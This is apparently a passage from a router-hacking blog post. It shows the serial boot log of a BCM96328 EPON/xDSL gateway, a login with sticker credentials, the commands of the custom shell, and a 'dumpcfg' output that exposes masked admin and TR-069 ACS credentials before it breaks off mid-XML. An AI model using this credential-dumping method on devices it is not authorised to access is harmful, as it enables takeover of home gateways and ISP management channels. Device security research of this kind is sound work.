Jan 1 00:00:06 lightbox: findStrToInt:898 str = fxs0:8%fxs1:9, delim = fxs0:, gpio = 8
cfgmgr: tree_parse_config load form default /etc/config.xml.
main.c: signal, SIGTERM 15, SIGINT 2, SIGCHLD 18.
main.c,main: entering while loop
sendto return -1, errno[2]: No such file or directory
comm_sendto monitor msg error -1(No such file or directory)
sendto return -1, errno[2]: No such file or directory
comm_sendto monitor msg error -1(No such file or directory)
cmsMsg_init failed, ret=9002
===== Release Version 4.02L.03.wp1 (build timestamp 120316_1659) =====
######### Load CMS_CONFIG_PRIMARY #########
insmod: cannot insert `/lib/modules/2.6.21.5/extra/pktflow.ko': Success (17): Success
wlctl: not found
sntp:error:14.355:oalMsg_send:212:write failed, errno=14 Bad address
sntp:error:14.355:main:716:Fail to send state change msg failed. ret=9002
ssk:error:14.401:rutPMap_isLanInterfaceFilter:815:could not find filter interface 3
ssk:error:14.402:rutPMap_isWanInterfaceFilter:846:could not find filter interface 3
ssk:error:14.402:rutPMap_associateDhcpVendorIdWithBridge:1439:not implemented yet
ssk:error:14.402:rutPMap_isLanInterfaceFilter:815:could not find filter interface 4
ssk:error:14.403:rutPMap_isWanInterfaceFilter:846:could not find filter interface 4
ssk:error:14.403:rutPMap_associateDhcpVendorIdWithBridge:1439:not implemented yet
ssk:error:14.403:rutPMap_isLanInterfaceFilter:815:could not find filter interface 5
ssk:error:14.403:rutPMap_isWanInterfaceFilter:846:could not find filter interface 5
ssk:error:14.403:rutPMap_associateDhcpVendorIdWithBridge:1439:not implemented yet
ssk:error:14.404:rutPMap_isLanInterfaceFilter:815:could not find filter interface 6
ssk:error:14.404:rutPMap_isWanInterfaceFilter:846:could not find filter interface 6
ssk:error:14.404:rutPMap_associateDhcpVendorIdWithBridge:1439:not implemented yet
device eth0 is not a slave of br0
device eth1 is not a slave of br0
device eth2 is not a slave of br0
device eth3 is not a slave of br0
Illegal target name.
Chain (null) doesn't exist.
interface eth4_2.85 does not exist!
interface eth4_2.85 does not exist!
SIOCGIFFLAGS: No such device
error can't get ip addr by idxsetInterfaceNoTx(eth4_2.51)
ready to set DEV flags :0x4
set eth4_2.51 IFF_RXONLY OK!
ssk:error:28.854:rutWan_setMulticastVlan:6338:----ebtables -D OUTPUT 1 -p ARP -o eth4_2.51 -j DROP----
ssk:error:28.943:rutWan_setMulticastVlan:6362:----ebtables -I FORWARD 1 -o eth4_2.51 -j DROP----
device eth4_2.51 is not a slave of br1
recovered previous ppp session info ppp0_3(xxxxxxxxxxxx/3674)
ssk:error:29.927:mdm_validateParamNodeString:4412:param name=InterfaceID, error=9007
ssk:error:29.927:mdm_activateObjects:1153:rcl handler reports error=9007 on PhyInterface {1,1}
RTNETLINK answers: No such file or directory
tr69c:error:30.936:xdslCtl_Open:91:open error 6
=========================================
CTCP START
=========================================
send CMS_MSG_PON_LOS_HAPPEN
ssk:error:31.651:initVodslBoundIpIfWanSideUpLocked:750:Failed to get WAN Connection object
00:00:32 sip_start:CfmAgent_Init
00:00:32 Init status: 1
vodsl:debug:32.040:oalMsg_init:132:commFd=5 connected to smd
vodsl:debug:32.071:oalMsg_init:153:sent LAUNCHED message to smd
vodsl:notice:32.072:cmsMdm_init:176:entered, eid=11(vodsl) shmid=0
vodsl:notice:32.072:oalShm_init:135:attaching to existing shmId=0
vodsl:notice:32.072:oalLck_init:118:attach existing done, semid=0
vodsl:notice:32.072:cmsMem_initSharedMemPointer:94:shm pool: 0x5881a498-0x58888000
vodsl:debug:32.073:cmsMdm_init:224:attach existing done, ret=0
vodsl:debug:32.073:oal_lock:186:lock currently held by pid=104 func=ssk_init
###########rutTop_setFlowcache 1299 count:0
����flowcacheConfigɳ�ɹ�
vodsl:debug:34.198:oal_lock:236:lock grab result, rc=0 errno=9
vodsl:debug:34.198:cmsLck_acquireLockTraced:76:acquired lock. callerFuncName provisSetVodslLogLevel
vodsl:debug:34.241:cmsLck_releaseLockTraced:143:lock hold time=43ms, acquiring lock callerFuncName provisSetVodslLogLevel; releasing lock callerFuncName provisSetVodslLogLevel;
tx_count = 1
tx_count = 1
can not open dev miscchar
Start: name = delay_start_sip, pid = voiceapp-pid
fork
pid is 0
exec /etc/delay_start_sip(792)
pid is 792
Start loopback check process~!
Loading /lib/modules/2.6.21.5/extra/dspdd.ko
insmod: cannot insert `/lib/modules/2.6.21.5/extra/dspdd.ko': Success (17): Success
module loaded /lib/modules/2.6.21.5/extra/dspdd.ko
module loaded /lib/modules/2.6.21.5/extra/dspdd.ko
Loading /lib/modules/2.6.21.5/extra/endpointdd.ko
insmod: cannot insert `/lib/modules/2.6.21.5/extra/endpointdd.ko': Success (17): Success
module loaded /lib/modules/2.6.21.5/extra/endpointdd.ko
module loaded /lib/modules/2.6.21.5/extra/endpointdd.ko
Loading /modules/mxpmod.ko
MXP module loading
MXP_TMR: notice linux timer base tick 1000.
MXP: ======= line = 1484 =============
MXP: ======= line = 1502 =============
MXP: ======= line = 1540 =============
MXP module loaded
module loaded /modules/mxpmod.ko
module loaded /modules/mxpmod.ko
Loading /modules/mxpmem.ko
module loaded /modules/mxpmem.ko
module loaded /modules/mxpmem.ko
Loading /modules/tiuhal_26.ko
module loaded /modules/tiuhal_26.ko
module loaded /modules/tiuhal_26.ko
Loading /modules/tiuhw_mod_26.ko
module loaded /modules/tiuhw_mod_26.ko
module loaded /modules/tiuhw_mod_26.ko
Loading /modules/tiuhw_an_26.ko
TIUHW module start loading
tiu_if_check_ids():TID_TYPE 22
module loaded /modules/tiuhw_an_26.ko
module loaded /modules/tiuhw_an_26.ko
module return value 0
current modules loaded
tiuhw_an_26 212576 0 - Live 0xc0131000
tiuhw_mod_26 1424 0 - Live 0xc012f000 (P)
tiuhal_26 4208 2 tiuhw_an_26,tiuhw_mod_26, Live 0xc0122000 (P)
mxpmem 4736 0 - Live 0xc0125000 (P)
mxpmod 361024 2 tiuhw_an_26,mxpmem, Live 0xc02c0000 (P)
nf_conntrack_urlfilter 2192 0 - Live 0xc011e000 (P)
ipt_iprange 640 0 - Live 0xc011c000
ip6table_filter 720 0 - Live 0xc0115000
ip6table_mangle 1040 0 - Live 0xc00f5000
ip6_tables 9136 2 ip6table_filter,ip6table_mangle, Live 0xc0118000
nf_nat_ipsec 720 0 - Live 0xc00f7000
nf_conntrack_ipsec 5184 1 nf_nat_ipsec, Live 0xc010f000
nf_nat_rtsp 2688 0 - Live 0xc010d000
nf_conntrack_rtsp 5920 1 nf_nat_rtsp, Live 0xc00ff000
nf_nat_ftp 1632 0 - Live 0xc00eb000
nf_conntrack_ftp 6144 1 nf_nat_ftp, Live 0xc00fc000
nf_nat_h323 5360 0 - Live 0xc00f9000
nf_conntrack_h323 37232 1 nf_nat_h323, Live 0xc0102000
nf_nat_proto_esp 512 0 - Live 0xc00ed000
nf_conntrack_proto_esp 6528 0 - Live 0xc00f2000
ip_conntrack_devicectl 7184 0 - Live 0xc00ef000 (P)
iptable_mangle 1008 0 - Live 0xc00cc000
xt_DSCP 992 0 - Live 0xc00e9000
xt_dscp 848 0 - Live 0xc00e7000
xt_MARK 960 0 - Live 0xc00e2000
xt_mark 624 0 - Live 0xc00e0000
ipt_LOG 4640 0 - Live 0xc00e4000
xt_limit 1152 0 - Live 0xc00de000
xt_state 832 0 - Live 0xc00dc000
ipt_REDIRECT_FIRST_HTTP 1136 0 - Live 0xc00da000
ipt_REDIRECT 704 0 - Live 0xc00ce000
ipt_MASQUERADE 2272 0 - Live 0xc00d8000
iptable_nat 4176 1 - Live 0xc0099000
nf_nat 10720 8 nf_nat_rtsp,nf_nat_ftp,nf_nat_h323,nf_nat_proto_esp,ipt_REDIRECT_FIRST_HTTP,ipt_REDIRECT,ipt_MASQUERADE,iptable_nat, Live 0xc00d4000
nf_conntrack_ipv4 8448 2 iptable_nat, Live 0xc00d0000
nf_conntrack 39792 13 nf_conntrack_ipsec,nf_nat_rtsp,nf_conntrack_rtsp,nf_nat_ftp,nf_conntrack_ftp,nf_nat_h323,nf_conntrack_h323,nf_conntrack_proto_esp,xt_state,ipt_MASQUERADE,iptable_nat,nf_nat,nf_conntrack_ipv4, Live 0xc00a8000
nfnetlink 3248 0 - Live 0xc00a6000
xt_TCPMSS 2640 0 - Live 0xc00a4000
xt_tcpudp 1824 8 - Live 0xc00a2000
iptable_filter 864 1 - Live 0xc009c000
ip_tables 8496 3 iptable_mangle,iptable_nat,iptable_filter, Live 0xc009e000
x_tables 7936 16 ipt_iprange,ip6_tables,xt_DSCP,xt_dscp,xt_MARK,xt_mark,ipt_LOG,xt_limit,xt_state,ipt_REDIRECT_FIRST_HTTP,ipt_REDIRECT,ipt_MASQUERADE,iptable_nat,xt_TCPMSS,xt_tcpudp,ip_tables, Live 0xc007f000
endpointdd 1385200 0 - Live 0xc016c000 (P)
dspdd 1576144 1 endpointdd, Live 0x8108c700 (P)
bcm_enet 85392 0 - Live 0xc00b4000 (P)
bcmprocfs 24176 0 - Live 0xc0092000 (P)
pktflow 59568 0 - Live 0xc0082000 (P)
can't get Addr: Cannot assign requested address
error can't get ip addr by idxsetsockopt - MRT6_INIT
chmod: /usr/sbin/ggsip: Read-only file system
Successfully locked range: start=0x005a6000, end=0x005a7000, len=0x00001000
mxp_initHandle, mxpFd 4.
XgetTicksRate: 1000
Initializing signal_handler
src/lmxpmain.c:main:707 add mxp_sig_ignore!!
Initializing signal_handler
Thread 1 = mxproot, priority -1
user level MXP memory module loaded
can not open dev miscchar
mlxDbgInit: MXDebug_segm_storage = b4ce18, MXDebug_segm_id = 0.
mlxDbgInit: MXSyslog_segm_storage = 9a391c, MXSyslog_segm_id = 1.
>>>> rootInit <<<<<
Creating Golden Gateway application...
Thread 3 = ROOT, priority 0
Escaping to MXP command shell. Use 'exit' to exit.
4294704567 - NWIF: nw_create() ticks_5 5, ticks_2 2.
Thread 4 = NWIF01, priority 1
4294704584 - [DSP_BCM] vrgEndptDriverOpen: Endpoint driver open success!
vodsl:error:39.297:InitToVTP:3140:modify shanghai digitmap and faxmode begin
vodsl:error:39.300:rcl_voiceProfSipObject:533:Region is 0
vodsl:error:39.304:dalVoice_SetFaxMode_For_SHANGHAI:2579:fax mode shanghai version other
vodsl:error:39.305:InitToVTP:3145:modify shanghai digitmap and faxmode midd
vodsl:error:39.305:dalVoice_SetDigitMapMatchMode_For_SHANGHAI:2629:match mode shanghai version min
vodsl:error:39.309:dalVoice_SetMaxFlashDuration_For_SHANGHAI:2671:MaxFlashDuration shanghai version 500
vodsl:error:39.312:dalVoice_SetMinFlashDuration_For_SHANGHAI:2715:MinFlashDuration shanghai version 90
vodsl:error:39.315:dalVoice_SetSipRegisterExpires_For_SHANGHAI:2758:RegisterExpires shanghai version 3600
vodsl:error:39.317:rcl_voiceProfSipObject:533:Region is 0
vodsl:error:39.318:dalVoice_SetEnLocalFeature_For_SHANGHAI:2909:EnLocalFeature shanghai version 2
vodsl:error:39.321:dalVoice_SetSubsUA_For_SHANGHAI:2860:SubsUA shanghai version on
vodsl:error:39.323:dalVoice_SetSubsReg_For_SHANGHAI:2808:SubsReg shanghai version on
vodsl:error:39.324:dalVoice_SetSubsUA_For_SHANGHAI:2860:SubsUA shanghai version on
vodsl:error:39.326:dalVoice_SetSubsReg_For_SHANGHAI:2808:SubsReg shanghai version on
vodsl:error:39.327:InitToVTP:3158:modify shanghai digitmap and faxmode end
vodsl:error:39.328:InitToVTP:3166:regionVer:0 int type:0
vodsl:error:39.337:InitToVTP:3182:AuthUserName value is
vodsl:error:39.427:InitToVTP:3166:regionVer:0 int type:0
vodsl:error:39.436:InitToVTP:3182:AuthUserName value is
END lrx_count=263
CfmAgent_PostGroupEnd tx_count = 261
******* DSP: Found BCM96328 *******
******* DSP: PCM running in 16 bit mode *******
gInterruptCounter = 0x8115C908
gInterruptErrors = 0x81149D90
gNextRxDesc = 0x81149D84
gNextTxDesc = 0x81149D80
32 ms ECAN tail-length
*** gStartRxDesc[0] = 0xA0268000
*** gBufferSizeBytes = 640
*** gStartTxDesc[0] = 0xA024F000
halPcmInit 325 nextTxDesc = 0xA024F000
halPcmInit 325 nextTxDesc = 0xA024F008
halPcmInit 329 Ownership for TX desc not set. Use this buffer.
DSP: Interrupt Masks
---------------
IrqMask = 0x11000000
IrqMask1 = 0x00000004
DSP: Interrupt Status
-----------------
IrqStatus = 0x0001E000
IrqStatus1 = 0x0001E000
provision_apply: voice_config
[provision_apply:5861]status:1
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
4294706778 - CCU: ccu_module_init ccu_event_base 0x1, task 0x0
4294706778 - AMU: amu_module_init amu_event_base 0x4, task 0x0
4294706778 - SPU: spu_module_init spu_event_base 0x5, task 0x0
4294706778 - SFU: sfu_module_init sfu_event_base 0x6, task 0x0
4294706778 - CCU: ccu_create 7 queue 2 4
4294706778 - SPU: spu_create 7 queue 20
4294706778 - SFU: sfu_create 7 queue 40
4294706778 - SSMU: max_call_control_blocks = 14
hwu_get_dsp_poll_mode(333) not achieved !!!!!!!!!!!!!!
Hardware configuration: num_of_tcids = 2
no_of_tids = 1
companding = 0
poll_mode 1
Thread 10 = DEX, priority 1
Memory mapped for 2 TCIDS
4294706778 - [DSP_BCM] DSP(BRCM): Can't find interface(10)!
4294706778 - SPU: spup_init
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
[provision_query]status/VOCCFG_STATUS
SLIC: Received VP_DEV_EVID_DEV_INIT_CMP event (i = 301)
SLIC: Found event: pEvent.eventCategory = 2 pEvent.eventId = 0x400
INIT DEVICE 0 OK
INIT DEVICE 1 OK
4294710242 - NMM: Build contains Only TIU.
4294710242 - nmmp_restore_config end
4294710242 - NMM: Starting Periodic Timer. rate=200 msec
Jan 1 00:00:44 voice: Starting voice app
Jan 1 00:00:44 voice_app:
[comm_start:76] Warning, Using linux socket Default SO_RCVBUF!!!!!!
Jan 1 00:00:44 voice_app: [comm_start:84] expected value(0K), actual value(114K)
[nw_setsockopt:2278]media DSCP = 0x1c
Jan 1 00:00:44 voice: V2N_STARTUP_READY
4294710442 - NMM: nmmp_ntfy_startup: Sending STARTUP_READY
Jan 1 00:00:44 lightbox: findStrToInt:898 str = fxs0:8%fxs1:9, delim = fxs0:, gpio = 8
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
voice_app_ready:1204 Send Wan UP
4294710481 - SSMU:* Network status mask was 0x00000000
4294710481 - SSMU:* Network status mask is 0x00000000
Jan 1 00:00:44 lightbox: findStrToInt:898 str = fxs0:8%fxs1:9, delim = fxs0:, gpio = 8
[provision_query]status/VOCCFG_STATUS
Start: name = nmmprov, pid = prov_nmmcli
fork
pid is 0
exec /usr/sbin/nmmprov(913)
pid is 913
Initializing signal_handler
4294710797 - NMM Server: Client connected. id=1, socket=17, addr=0x7f000001
OK
OK
4294711013 - NMM: nmmp_activate_config safely
Jan 1 00:00:45 voice: Accessor:[CPE] Method:[DEVICEWARNING] Para:[] Result:[0] [104108][PRIMARY] VOIP Configuration Changed!
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
Process nmmprov(913) exited with code 0
[provision_query]status/VOCCFG_STATUS
[provision_report:3832]status:0
[provision_report:3708] report client_id=0
Jan 1 00:00:45 lightbox: findStrToInt:898 str = fxs0:8%fxs1:9, delim = fxs0:, gpio = 8
4294711272 - SSMU: med_dev is invalid
4294711272 - SSMU: med_gw=(0) med_dev=
4294711272 - SSMU: ssmu_nmm_check_static_route_enable sig_dev is invalid
4294711272 - SSMU:* Local Media IP Set to 0.0.0.0
4294711272 - SSMU:* Local Media IP Set to 0.0.0.0, Media Dev Set to
4294711272 - NMM: open FLASH_CONFIG_TYPE_NSP_VERSION failed!
4294711272 - NMM: 0, Switched CAS, FXS Loop Start
[ssmup_set_tos_for_lcl_addr:4619]Signaling DSCP = 0x0
4294712152 - SSMU: TOS=0 was set successfully for hLocalAddr=0x0xd23de0
[ssmup_set_tos_for_lcl_addr:4619]Signaling DSCP = 0x0
4294712152 - SSMU: TOS=0 was set successfully for hLocalAddr=0x0xd23ec0
[ssmup_set_tos_for_lcl_addr:4619]Signaling DSCP = 0x0
4294712152 - SSMU: TOS=0 was set successfully for hLocalAddr=0x0xd23fa0
4294712152 - ============================================================
4294712152 - SSMU Inited RV SIP Stack Version 5.0.0.29 successfully!!
4294712152 - ============================================================
4294712215 - nmmp_config_port_cas port 0 disable
4294712215 - NMM: 1, Switched CAS, FXS Loop Start
4294712215 - nmmp_config_port_cas port 1 disable
Jan 1 00:00:46 voice: V2N_ACTIVE_CONFIG_READY
[CfmAgent_GetStatus][E_VOCCFG_STATUS]
Jan 1 00:00:46 lightbox: findStrToInt:898 str = fxs0:8%fxs1:9, delim = fxs0:, gpio = 8
wl interference 2
wl frameburst 1
wl: not found
4294712339 - SSMU:* Network status mask was 0x00000008
4294712339 - SSMU:* Network status mask is 0x00000008
4294712339 - NMM: IP Address Received - 0/lo/127.0.0.1/255.255.255.255/0.0.0.0/0.0.0.0/0.0.0.0/0/0/0.0.0.0/0/0/0/0/0
4294712339 - NMM: nmmp_activate_config forcedly
Jan 1 00:00:46 voice: Accessor:[CPE] Method:[DEVICEWARNING] Para:[] Result:[0] [104108][PRIMARY] VOIP Configuration Changed!
4294712380 - SSMU:* Network status mask was 0x00000008
4294712380 - SSMU:* Network status mask is 0x00000008
[provision_query]status/VOCCFG_STATUS
4294712715 - ============================================================
4294712715 - SSMU Destroyed RV SIP Stack!!
4294712715 - ============================================================
4294712715 - SSMU: ssmu_nmm_check_static_route_enable sig_dev is invalid
4294712715 - SSMU: med_dev lo is invalid
4294712715 - SSMU: med_gw=(0) med_dev=lo
4294712715 - SSMU: ssmu_nmm_check_static_route_enable sig_dev lo is invalid
4294712715 - SSMU:* Local Media IP Set to 127.0.0.1
4294712715 - SSMU:* Local Media IP Set to 127.0.0.1, Media Dev Set to lo
4294712715 - NMM: open FLASH_CONFIG_TYPE_NSP_VERSION failed!
[ssmup_set_tos_for_lcl_addr:4619]Signaling DSCP = 0x0
4294712715 - SSMU: TOS=0 was set successfully for hLocalAddr=0x0xd1f068
[ssmup_set_tos_for_lcl_addr:4619]Signaling DSCP = 0x0
4294712715 - SSMU: TOS=0 was set successfully for hLocalAddr=0x0xd1f148
[ssmup_set_tos_for_lcl_addr:4619]Signaling DSCP = 0x0
4294712715 - SSMU: TOS=0 was set successfully for hLocalAddr=0x0xd1f228
4294712715 - ============================================================
4294712715 - SSMU Inited RV SIP Stack Version 5.0.0.29 successfully!!
4294712715 - ============================================================
4294712715 - NMM: 0, Switched CAS, FXS Loop Start
4294712715 - nmmp_config_port_cas port 0 disable
4294712715 - NMM: 1, Switched CAS, FXS Loop Start
4294712715 - nmmp_config_port_cas port 1 disable
wl: not found
eth4 mac: E0:30:05:XX:XX:XX
bind address: 0.0.0.0
bind port: 9999
Get the Epon Base Mac from the ONU OK
Epon Base Mac: E0:30:05:XX:XX:XX
TkExtOamTaskInit success!
TkExtOamGetRstpBridge returns: 15
bridge mode: 0
hold time: 0
fwd delay: 0
max age: 0
priority: 0
TkExtOamSetRstpBridge returns: 15
TkExtOamGetRstpBridge returns: 15
bridge mode: 0
hold time: 1
fwd delay: 1
max age: 1
priority: 1
SDK VERSION:0.1.13
SDK VERSION:111
press ctrl+c to stop for debug
configure PON upstream queue mapping with VLAN CoS
01 01 00 03 00 00 00 09 02 01 0a 00 00 00 00 00
00 00 00 01
01 01 00 03 00 00 00 09 02 01 0a 00 00 00 00 00
00 00 01 01
01 01 00 02 00 00 00 09 02 01 0a 00 00 00 00 00
00 00 02 01
01 01 00 02 00 00 00 09 02 01 0a 00 00 00 00 00
00 00 03 01
01 01 00 01 00 00 00 09 02 01 0a 00 00 00 00 00
00 00 04 01
01 01 00 01 00 00 00 09 02 01 0a 00 00 00 00 00
00 00 05 01
01 01 00 00 00 00 00 09 02 01 0a 00 00 00 00 00
00 00 06 01
01 01 00 00 00 00 00 09 02 01 0a 00 00 00 00 00
00 00 07 01
enable PON Snooping
enable PON XCVR transmitter
++++++++++++++++ iptvVlanId = 85,commult_vlan = 51 ,voipVlanId =46
###################TWDownstreamVlanRule 887
EponPortInfo.EponLosState = 1
ctcp:error:51.490:cmsLck_releaseLockTraced:112:do not have lock! callerFuncName get_update_TK_ok_flag
in get_update_TK_ok_flag,line:708+++
in update_TK,line:735+++
Digital Media Server Version [1.3 Build Mar 16 2012 17:07:15]
Content Dir Path Set To: /mnt
IP: 192.168.1.1
wget: Unable to connect to remote host (58.246.0.10): Network is unreachable
BCM96328 xDSL Router
Login:
This gives us plenty of information about the system. For one it is a Linux system and no proprietary embedded OS. The UserPass mentioned in the bootloader is the same as listed on a sticker on the bottom of the unit, this same sticker also mentions a user called useradmin. I know these credentials are used to access the web GUI on 192.168.1.1 Using the credentials on the login prompt gives us a custom shell with plenty of commands to play with:
Login: useradmin
Password:
> help
?
help
logout
exit
quit
reboot
adsl
xtm
brctl
cat
loglevel
logdest
virtualserver
ddns
df
dumpcfg
dumpmdm
meminfo
syslog
psp
echo
ifconfig
kill
ping
ps
pwd
macaddr
sntp
sysinfo
tftp
voice
arp
defaultgateway
dhcpserver
dns
lan
lanhosts
passwd
ppp
restoredefault
loaddefaultconfig
route
save
swversion
wan
keyteston
keytestoff
allledon
allledoff
softversion
usbtest
eponglobal
opticalxcvr
alarm
eponStatistics
ctcLoidAuth
zteSn
resetCtcp
CreateWdDev
OpenWd
CloseWd
FeedWd
StopFeedWd
SetHeartBeat
Let’s start by using the dumpcfg command to see what config is available for useradmin:
> dumpcfg
<?xml version="1.0"?>
<DslCpeConfig version="2.0">
<InternetGatewayDevice>
<LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
<WANDeviceNumberOfEntries>1</WANDeviceNumberOfEntries>
<DeviceInfo>
<FirstUseDate>0001-01-01T00:00:00Z</FirstUseDate>
<X_CT-COM_ALGAbility>
<FTPEnable>TRUE</FTPEnable>
</X_CT-COM_ALGAbility>
<X_CT-COM_TeleComAccount>
<Password>telecomadminXXXXXXXX</Password>
</X_CT-COM_TeleComAccount>
<X_CT-COM_UPNP>
<Enable>TRUE</Enable>
</X_CT-COM_UPNP>
<X_CT_COM_RemoteStatus>
<StatusMessage>2</StatusMessage>
</X_CT_COM_RemoteStatus>
</DeviceInfo>
<X_BROADCOM_COM_WebUILanguage>
<SupportLanguage>Chinese</SupportLanguage>
</X_BROADCOM_COM_WebUILanguage>
<X_BROADCOM_COM_FlowCache>
<Enable>TRUE</Enable>
</X_BROADCOM_COM_FlowCache>
<X_BROADCOM_COM_LoginCfg>
<AdminUserName>telecomadmin</AdminUserName>
<AdminPassword>YYYYYYYYYYYY</AdminPassword>
<UserUserName>useradmin</UserUserName>
<UserPassword>ZZZZZZZZ</UserPassword>
</X_BROADCOM_COM_LoginCfg>
<X_BROADCOM_COM_EthernetSwitch>
<NumberOfVirtualPorts>4</NumberOfVirtualPorts>
<EnableVirtualPorts>TRUE</EnableVirtualPorts>
<IfName>(null)</IfName>
<DisabledPorts>0</DisabledPorts>
</X_BROADCOM_COM_EthernetSwitch>
<ManagementServer>
<URL>http://devacs.edatahome.com:9090/ACS-server/ACS</URL>
<Username>hgw</Username>
<Password>hgwXXXXXXXX</Password>
<PeriodicInformEnable>TRUE</PeriodicInformEnable>
<PeriodicInformInterval>43200</PeriodicInformInterval>
<PeriodicInformTime>2000-01-01T00:00:08+00:00</PeriodicInformTime>
<X_BROADCOM_COM_BoundIfName>LAN</X_BROADCOM_COM_BoundIfName>
<ConnectionRequestUsername>itms</ConnectionRequestUsername>
<ConnectionRequestPassword>itmsXXXXXXXX</ConnectionRequestPassword>
<CTUserIPAddress instance="1">
</CTUserIPAddress>
<CTUserIPAddress instance="2">
</CTUserIPAddress>
<CTUserIPAddress instance="3">
</CTUserIPAddress>
<CTUserIPAddress instance="4">
</CTUserIPAddress>
<CTUserIPAddress instance="5">
</CTUserIPAddress>
<CTUserIPAddress instance="6">
</CTUserIPAddress>
<CTUserIPAddress instance="7">
</CTUserIPAddress>
<CTUserIPAddress instance="8">
</CTUserIPAddress>
<CTUserIPAddress nextInstance="9" ></CTUserIPAddress>
</ManagementServer>
<Time>
<X_BROADCOM_COM_NTPEnable>TRUE</X_BROADCOM_COM_NTPEnable>
<NTPServer1>time.windows.com</NTPServer1>
<NTPServer2>time.nist.gov</NTPServer2>
<LocalTimeZone>08:00</LocalTimeZone>
<DaylightSavingsStart>2000-01-01T00:00:59+00:00</DaylightSavingsStart>
<DaylightSavingsEnd>2000-01-01T00:00:59+00:00</DaylightSavingsEnd>
</Time>
<Layer2Bridging>
<BridgeNumberOfEntries>1</BridgeNumberOfEntries>
<FilterNumberOfEntries>6</FilterNumberOfEntries>
<MarkingNumberOfEntries>0</MarkingNumberOfEntries>
<AvailableInterfaceNumberOfEntries>6</AvailableInterfaceNumberOfEntries>
<Bridge instance="1">
<BridgeKey>0</BridgeKey>
<BridgeEnable>TRUE</BridgeEnable>
<BridgeName>Default</BridgeName>
</Bridge>
<Bridge nextInstance="2" ></Bridge>
<Filter instance="1">
<FilterKey>1</FilterKey>
<FilterEnable>TRUE</FilterEnable>
<FilterBridgeReference>0</FilterBridgeReference>
<FilterInterface>1</FilterInterface>
</Filter>
<Filter instance="2">
<FilterKey>2</FilterKey>
<FilterEnable>TRUE</FilterEnable>
<FilterBridgeReference>0</FilterBridgeReference>
<FilterInterface>2</FilterInterface>
</Filter>
<Filter instance="3">
<FilterKey>3</FilterKey>
<FilterEnable>TRUE</FilterEnable>
<FilterBridgeReference>0</FilterBridgeReference>
<FilterInterface>3</FilterInterface>
</Filter>
<Filter instance="4">
<FilterKey>4</FilterKey>
<FilterEnable>TRUE</FilterEnable>
<FilterBridgeReference>0</FilterBridgeReference>
<FilterInterface>4</FilterInterface>
</Filter>
<Filter instance="5">
<FilterKey>5</FilterKey>
<FilterEnable>TRUE</FilterEnable>
<FilterBridgeReference>0</FilterBridgeReference>
<FilterInterface>5</FilterInterface>
</Filter>
<Filter instance="6">
<FilterKey>6</FilterKey>
<FilterEnable>TRUE</FilterEnable>
<FilterBridgeReference>0</FilterBridgeReference>
<FilterInterface>6</FilterInterface>
</Filter>
<Filter nextInstance="8" ></Filter>
<AvailableInterface instance="1">
<AvailableInterfaceKey>1</AvailableInterfaceKey>
<InterfaceType>LANInterface</InterfaceType>
<InterfaceReference>InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.1</InterfaceReference>
</AvailableInterface>
<AvailableInterface instance="2">
<AvailableInterfaceKey>2</AvailableInterfaceKey>
<InterfaceType>LANInterface</InterfaceType>
<InterfaceReference>InternetGatewayDevice.LANDevice.1.LANUSBInterfaceConfig.1</InterfaceReference>
</AvailableInterface>
<AvailableInterface instance="3">
<AvailableInterfaceKey>3</AvailableInterfaceKey>
<InterfaceType>WANInterface</InterfaceType>
<InterfaceReference>InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1</InterfaceReference>
</AvailableInterface>
<AvailableInterface nextInstance="4" ></AvailableInterface>
</Layer2Bridging>
<QueueManagement>
<ClassificationNumberOfEntries>0</ClassificationNumberOfEntries>
<AppNumberOfEntries>0</AppNumberOfEntries>
<FlowNumberOfEntries>0</FlowNumberOfEntries>
<PolicerNumberOfEntries>0</PolicerNumberOfEntries>
<QueueNumberOfEntries>0</QueueNumberOfEntries>
</QueueManagement>
<LANDevice instance="1">
<LANEthernetInterfaceNumberOfEntries>4</LANEthernetInterfaceNumberOfEntries>
<LANUSBInterfaceNumberOfEntries>0</LANUSBInterfaceNumberOfEntries>
<LANWLANConfigurationNumberOfEntries>0</LANWLANConfigurationNumberOfEntries>
<X_BROADCOM_COM_IgmpSnoopingConfig>
<Enable>TRUE</Enable>
<Mode>Blocking</Mode>
</X_BROADCOM_COM_IgmpSnoopingConfig>
<LANHostConfigManagement>
<DHCPServerEnable>TRUE</DHCPServerEnable>
<MaxAddress>192.168.1.100</MaxAddress>
<IPInterfaceNumberOfEntries>1</IPInterfaceNumberOfEntries>
<X_CT-COM_STB-MinAddress>192.168.1.160</X_CT-COM_STB-MinAddress>
<X_CT-COM_STB-MaxAddress>192.168.1.200</X_CT-COM_STB-MaxAddress>
<X_CT-COM_Phone-MinAddress>192.168.1.210</X_CT-COM_Phone-MinAddress>
<X_CT-COM_Phone-MaxAddress>192.168.1.250</X_CT-COM_Phone-MaxAddress>
<X_CT-COM_Camera-MinAddress>192.168.1.110</X_CT-COM_Camera-MinAddress>
<X_CT-COM_Camera-MaxAddress>192.168.1.150</X_CT-COM_Camera-MaxAddress>
